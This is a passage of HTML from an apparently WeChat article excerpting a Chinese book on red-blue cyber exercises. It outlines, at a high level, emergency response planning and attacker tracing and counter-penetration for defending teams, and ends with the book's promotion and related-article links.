rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">全流量网络监控</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">主机监控</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">日志监控</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">蜜罐诱捕</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">情报工作支撑</span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.7 应急处突：完备的方案</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">通过近几年的红蓝对抗发展来看，红蓝对抗初期，蓝队成员通过普通攻击的方式，不使用0day或其他攻击方式，就能轻松突破红队的防守阵地。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">但是，随着时间的推移，红队防护体系早已从只有防火墙做访问控制，发展到现在逐步完善了WAF、IPS、IDS、EDR等多种防护设备，使蓝队难以突破，从而逼迫蓝队成员通过使用0day、Nday、现场社工、钓鱼等多种方式入侵红队目标，呈无法预估的特点。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">所以应急处突是近两年红蓝对抗中发展的趋势，同时也是整个红队防守水平的体现之处，不仅考验应急处置人员的技术能力，更检验多部门（单位）协同能力，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">所以制定应急预案应当从以下几个方面进行：</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">完善各级组织结构</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">，如监测组、研判组、应急处置组（网络小组、系统运维小组、应用开发小组、数据库小组）、协调组等。</span></span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">明确各方人员</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">，在各个组内担任的职责，如监测组的监测人员，负责某台设备的监测，并且7×12小时不得离岗等。</span></span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">明确各方设备的能力与作用</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">，如防护类设备、流量类设备、主机检测类设备等。</span></span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">制定可能出现的攻击成功场景</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">，如Web攻击成功场景、反序列化攻击成功场景、Webshell上传成功场景等。</span></span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">明确突发事件的处置流程</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">，将攻击场景规划至不同的处置流程：上机查证类处置流程、非上机查证类处置流程等。</span></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.8 溯源反制：人才是关键</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">溯源工作一直是安全的重要组成部分，无论在平常的运维工作，还是红蓝对抗的特殊时期，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">在发生安全事件后，能有效防止被再次入侵的有效手段，就是溯源工作。</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">在红蓝对抗的特殊时期，防守队中一定要有经验丰富、思路清晰的溯源人员，能够第一时间进行应急响应，按照应急预案分工，快速理清入侵过程，并及时调整防护策略，防止再次入侵，同时也为反制人员提供溯源到的真实IP，进行反制工作。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">反制工作是红队反渗透能力的体现，普通的防守队员一般也只具备监测、分析、研判的能力，缺少反渗透的实力。这将使防守队一直属于被动的一方，因为红队没有可反制的固定目标，也很难从成千上万的攻击IP里，确定哪些可能是攻击队的地址，这就要求红队中要有经验丰富的反渗透的人员。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">经验丰富的反渗透人员会通过告警日志，分析攻击IP、攻击手法等内容，对攻击IP进行端口扫描、IP反查域名、威胁情报等信息收集类工作，通过收集到的信息进行反渗透。红队还可通过效仿蓝队社工手段，诱导蓝队进入诱捕陷阱，从而达到反制的目的，定位蓝队自然人身份信息。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">限于篇幅，以上8种防守策略的细节并没有展开，只给出了大致的思路，如果你想了解策略的具体内容，可以阅读</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">《红蓝攻防》</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">这本书。</span></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">道高一尺，魔高一丈，网络攻防是没有硝烟和终局的战争，要保障信息的安全，我们应该时刻保持警惕，从策略、技术、人才等各方面做好准备。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><section data-role="paragraph" style="margin: 0px;padding: 0px;"><section style="margin: 0px;padding: 0px;letter-spacing: 0px;text-indent: 0em;font-size: 16px;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;font-size: 14px;color: rgb(127, 127, 127);line-height: 21px;font-family: 微软雅黑, &#34;Microsoft YaHei&#34;;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;font-size: 14px;color: rgb(127, 127, 127);line-height: 21px;font-family: 微软雅黑;background-color: rgb(255, 255, 255);">本文部分内容摘编自</span><span style="margin: 0px;padding: 0px;font-size: 14px;color: rgb(127, 127, 127);line-height: 21px;font-family: 微软雅黑;text-align: center;background-color: rgb(255, 255, 255);">《</span><span style="margin: 0px;padding: 0px;font-size: 14px;color: rgb(127, 127, 127);line-height: 21px;max-width: 100%;font-family: 微软雅黑;text-align: center;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;">红蓝攻防：构建实战化网络安全防御体系</span><span style="margin: 0px;padding: 0px;font-size: 14px;color: rgb(127, 127, 127);line-height: 21px;font-family: 微软雅黑;text-align: center;background-color: rgb(255, 255, 255);">》（ISBN：978-7-111-70640-3），</span><span style="margin: 0px;padding: 0px;font-size: 14px;color: rgb(127, 127, 127);line-height: 21px;font-family: 微软雅黑;background-color: rgb(255, 255, 255);">经出版方授权发布。</span></span></section><section style="margin: 0px;padding: 0px;letter-spacing: 0px;text-indent: 0em;font-size: 16px;text-align: center;line-height: 1.75em;"><br style="margin: 0px;padding: 0px;"/></section><section style="margin: 0px;padding: 0px;text-align: center;line-height: 1.75em;"><img class="rich_pages wxw-img" data-cropselx1="0" data-cropselx2="225" data-cropsely1="0" data-cropsely2="225" data-ratio="1" data-s="300,640" style="margin: 0px;padding: 0px;max-width: 100%;height: 225px;vertical-align: bottom;width: 225px;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=daba51bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FLSOjyib5giaVcw6TTXicGmxyq5kYeZBvLibaqE0SkVw4cjrFgkoibS2JQic2vMfS0rBUXlZAfzicZ7z5dA1MiaDOGJSWYQ%2F640%3Fwx_fmt%3Djpeg"/></section><p><mpcps class="js_editor_new_cps" data-traceid="ea1e9dea-c565-409b-bcef-564d9e9aa29b" data-goodssouce="1" data-pid="107_29416468" data-appuin="0" data-buffer="{&#34;category_id&#34;:10,&#34;pid&#34;:&#34;107_29416468&#34;,&#34;biz_uin&#34;:0,&#34;trace_id&#34;:&#34;ea1e9dea-c565-409b-bcef-564d9e9aa29b&#34;,&#34;sku_id&#34;:&#34;107_29416468&#34;,&#34;source_id&#34;:7,&#34;source_name&#34;:&#34;当当&#34;,&#34;audit_state&#34;:1,&#34;main_img&#34;:&#34;https://img.zhls.qq.com/3/49b9e719f34b4f63beafb2f790099ba3.jpg&#34;,&#34;product_name&#34;:&#34;红蓝攻防：构建实战化网络安全防御体系&#34;,&#34;current_price&#34;:7820,&#34;first_category_id&#34;:&#34;10&#34;,&#34;appuin&#34;:0,&#34;isNewCpsKOL&#34;:1}"></mpcps></p><section style="margin: 0px;padding: 0px;letter-spacing: 0px;text-indent: 0em;font-size: 16px;text-align: center;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);font-size: 14px;">《<span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);font-family: 微软雅黑;font-size: 14px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: center;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"><span style="color: rgb(127, 127, 127);font-family: 微软雅黑;font-size: 14px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: center;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">红蓝攻防：</span><span style="color: rgb(127, 127, 127);font-family: 微软雅黑;font-size: 14px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: center;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">构建实战化网络安全防御体系</span></span>》</span></span></section><section style="margin: 0px;padding: 0px;text-align: center;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;background-color: rgb(255, 255, 255);color: rgb(127, 127, 127);font-family: 微软雅黑;font-size: 14px;letter-spacing: normal;">点击上图了解及购买<br style="margin: 0px;padding: 0px;"/></span></section><section style="margin: 0px;padding: 0px;text-align: center;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);font-family: 微软雅黑;font-size: 14px;letter-spacing: normal;">转载请联系微信：DoctorData</span></section><section style="margin: 0px;padding: 0px;text-align: center;line-height: 1.75em;"><br style="margin: 0px;padding: 0px;"/></section><section style="margin: 0px;padding: 0px;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;font-family: 微软雅黑;font-size: 14px;"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);">推荐语：</span></strong></span><span style="margin: 0px;padding: 0px;font-family: 微软雅黑;color: rgb(127, 127, 127);font-size: 14px;">这是一部从红队、蓝队、紫队视角全面讲解如何进行红蓝攻防实战演练的著作，是奇安信安服团队多年服务各类大型政企机构的经验总结。本书全面讲解了蓝队视角的防御体系突破、红队视角的防御体系构建、紫队视角的实战攻防演练组织。系统介绍了红蓝攻防实战演练各方应掌握的流程、方法、手段、能力、策略，包含全面的技术细节和大量攻防实践案例。</span></span></section><section style="margin: 0px;padding: 0px;line-height: 1.75em;"><br/></section></section></section><section data-role="paragraph"><section style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;font-size: 16px;text-align: center;line-height: 1.75em;"><img class="rich_pages wxw-img" data-ratio="0.45454545454545453" style="margin: 0px;padding: 0px;max-width: 100%;height: auto !important;vertical-align: bottom;letter-spacing: 0.544px;font-variant-numeric: normal;line-height: 25.6px;widows: 1;display: inline;box-sizing: border-box !important;overflow-wrap: break-word !important;width: auto !important;visibility: visible !important;" data-type="gif" data-w="22" title="音符" src="https://wechat2rss.xlab.app/img-proxy/?k=ad8b7411&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz%2FcZV2hRpuAPiaJQXWGyC9wrUzIicibgXayrgibTYarT3A1yzttbtaO0JlV21wMqroGYT3QtPq2C7HMYsvicSB2p7dTBg%2F640%3Fwx_fmt%3Dgif"/></section><section style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;font-size: 16px;text-align: center;line-height: 1.75em;"><br style="margin: 0px;padding: 0px;"/></section><section style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: center;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;"><strong style="margin: 0px;padding: 0px;"><strong style="margin: 0px;padding: 0px;caret-color: rgb(255, 0, 0);"><span style="margin: 0px;padding: 0px;letter-spacing: normal;color: rgb(127, 127, 127);font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;font-size: 15px;max-width: 100%;caret-color: red;"><strong style="margin: 0px;padding: 0px;"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;max-width: 100%;caret-color: red;font-size: 14px;color: rgb(0, 122, 170);">刷刷视频</span><span style="margin: 0px;padding: 0px;letter-spacing: normal;max-width: 100%;caret-color: red;">👇</span></strong></strong></span></strong></strong></span></section><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><section data-role="paragraph" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section data-role="paragraph" style="margin: 0px;padding: 0px;"><section data-role="paragraph" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><br/></section></section></section></section></section></section></section><section class="channels_iframe_wrp wxw_wechannel_card_not_horizontal"><mpvideosnap class="js_uneditable custom_select_card channels_iframe videosnap_video_iframe" data-pluginname="videosnap" data-id="export/UzFfAgtgekIEAQAAAAAAG4oBSo8tZAAAAAstQy6ubaLX4KHWvLEZgBPEzKMkLVI7dYSDzNPgMIvd4JncaZmvJJaJT_7zKZRd" data-url="https://findermp.video.qq.com/251/20304/stodownload?encfilekey=rjD5jyTuFrIpZ2ibE8T7YmwgiahniaXswqzzI8kKHOvX8TIZTEiaBVXsFgVBicGpObPibcd4fVAwW7GGZC7CBrf7LfBsogxLCPsAAtcUNDRtYibib5Uo12hCM1QREA&amp;adaptivelytrans=0&amp;bizid=1023&amp;dotrans=0&amp;hy=SH&amp;idx=1&amp;m=&amp;scene=0&amp;token=AxricY7RBHdX4DdCxjJo0LcDecnf063b5Brv1KZY5MUsAheEK3yayCF4R9E1hC3G2rmkib56eMaH4" data-headimgurl="http://wx.qlogo.cn/finderhead/wLYvKbshCBkgChhlYMguCaW7IVClDib5pOaLPQ5VklW4/0" data-username="v2_060000231003b20faec8c5e1891ec3d4cc06ed37b0778b2294321e59f859f1803ad4991bd141@finder" data-nickname="华章计算机" data-desc="奇安信集团官方出品，红蓝攻防演练行业标准参考。
#机械工业出版社 #华章新书 
" data-nonceid="9980316661908177057" data-type="video" data-width="1080" data-height="1080"></mpvideosnap></section><section style="line-height: 1.75em;"><br/></section></section></section><section data-role="paragraph" style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><section data-role="outer" label="edit by 135editor" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><section data-role="paragraph" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section data-role="paragraph" style="margin: 0px;padding: 0px;"><section data-role="paragraph" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section style="margin: 0px;padding: 0px;text-align: center;"><strong style="margin: 0px;padding: 0px;font-size: 14px;"><span style="margin: 0px;padding: 0px;color: rgb(0, 122, 170);">干货直达👇</span></strong></section><section style="margin: 0px;padding: 0px;text-align: center;"><br style="margin: 0px;padding: 0px;"/></section></section></section></section></section></section></section></section></section><ul class="list-paddingleft-1" style="margin: 0px;padding: 0px 0px 0px 1.2em;box-sizing: border-box;width: 577.422px;list-style-type: circle;"><li style="margin: 0px;padding: 0px;clear: both;"><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzI5OTk5OTM2Mw==&amp;mid=2247559584&amp;idx=2&amp;sn=c97938334c8c1e4410e82bf0355d92ca&amp;chksm=ec8da04cdbfa295a68a59bfaa1160de544542f46ae7a94bd1c14f0b8a0172aa80d2125278750&amp;scene=21#wechat_redirect" textvalue="2022上半年朋友圈都在传的10本书，找到了" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" style="margin: 0px;padding: 0px;color: rgb(0, 122, 170);text-decoration: underline;font-size: 12px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;color: rgb(0, 122, 170);font-size: 12px;letter-spacing: normal;">2022上半年朋友圈都在传的10本书，找到了</span></a><br style="margin: 0px;padding: 0px;"/></p></li><li style="margin: 0px;padding: 0px;clear: both;"><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzI5OTk5OTM2Mw==&amp;mid=2247559549&amp;idx=2&amp;sn=0f5804205fa30907ad6134564e699542&amp;chksm=ec8da091dbfa2987e12b6fc39580d449262daa161adac26b5f7ca6af2c4c56e53df388f1d09c&amp;scene=21#wechat_redirect" textvalue="爬虫玩得好，牢饭吃到饱？这3条底线千万不能碰！" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);text-decoration: underline;font-size: 12px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);font-size: 12px;letter-spacing: normal;">爬虫玩得好，牢饭吃到饱？这3条底线千万不能碰！</span></a></p></li><li style="margin: 0px;padding: 0px;clear: both;"><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzI5OTk5OTM2Mw==&amp;mid=2247559328&amp;idx=2&amp;sn=198860c2ad1c07f08352ba434b7e6b84&amp;chksm=ec8da14cdbfa285adf1c24d3b7aabd79e19221411b6c72e593a6e689c3d1f231b97ae4a33658&amp;scene=21#wechat_redirect" textvalue="这几年爆火的智能物联网（AIoT），到底前景如何？" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" style="margin: 0px;padding: 0px;color: rgb(87, 107, 149);text-decoration: underline;"><span style="margin: 0px;padding: 0px;text-decoration: underline;font-size: 12px;color: rgb(0, 122, 170);">这几年爆火的智能物联网（AIoT），到底前景如何？</span></a></p></li><li style="margin: 0px;padding: 0px;clear: both;"><section data-role="paragraph" style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><section data-role="outer" label="edit by 135editor" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzI5OTk5OTM2Mw==&amp;mid=2247559327&amp;idx=2&amp;sn=fb24f34e5163dcd15161bf4144c45f99&amp;chksm=ec8da173dbfa2865058c55063c4b4d18b2c328332f1da1169fe963ec70ae3885fc2b6df3bc1f&amp;scene=21#wechat_redirect" textvalue="大消费企业怎样做数字化转型？" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);text-decoration: underline;font-size: 12px;"><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(127, 127, 127);">大消费企业怎样做数字化转型？</span></a></p></section></section></section></li></ul></section></section></section><section data-role="paragraph" style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section data-role="paragraph" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section style="margin: 0px;padding: 0px;"><br style="margin: 0px;padding: 0px;"/></section><section style="margin: 0px;padding: 0px;text-align: center;"><span style="margin: 0px;padding: 0px;font-size: 14px;"><strong style="margin: 0px;padding: 0px;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;color: rgb(0, 122, 170);">更多精彩</span></strong></span><strong style="margin: 0px;padding: 0px;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 15px;color: rgb(0, 122, 170);">👇</span></strong><br style="margin: 0px;padding: 